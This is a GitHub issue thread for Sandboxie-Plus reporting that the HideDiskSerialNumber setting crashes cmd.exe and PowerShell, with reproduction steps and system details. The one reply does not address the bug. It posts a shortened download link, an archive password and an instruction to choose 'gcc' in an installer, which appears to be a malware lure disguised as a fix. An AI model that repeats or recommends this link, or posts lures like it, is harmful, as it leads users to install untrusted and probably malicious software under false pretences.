### ISSUE TITLE
HideDiskSerialNumber option causes applications to crash

### ISSUE THREAD

**Issue by offhub** [sandboxie-plus/Sandboxie#4185]
### Describe what you noticed and did

1. Enable `HideDiskSerialNumber`
2. Run CMD
3. Type `DIR` and enter
4. `CMD` will crash

### How often did you encounter it so far?

Every time

### Expected behavior

Not crash

### Affected program

cmd.exe, powershell.exe

### Download link

Not relevant

### Where is the program located?

The program is installed only outside the sandbox.

### Did the program or any related process close unexpectedly?

No, not at all.

### What version of Sandboxie are you running now?

Sandboxie-Plus 1.14.7 64-bit

### Is it a new installation of Sandboxie?

I recently did a new clean installation.

### In which sandbox type you have this problem?

All sandbox types (I tried them all).

### Can you reproduce this problem on a new empty sandbox?

I can confirm it also on a new empty sandbox.

### What is your Windows edition and version?

Windows 11 Pro 23H2 64-bit (22631.3880)

### In which Windows account you have this problem?

A local account (Administrator).

### Please mention any installed security software

Microsoft Windows Defender

### Sandboxie.ini configuration

```ini
HideDiskSerialNumber=y
```

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
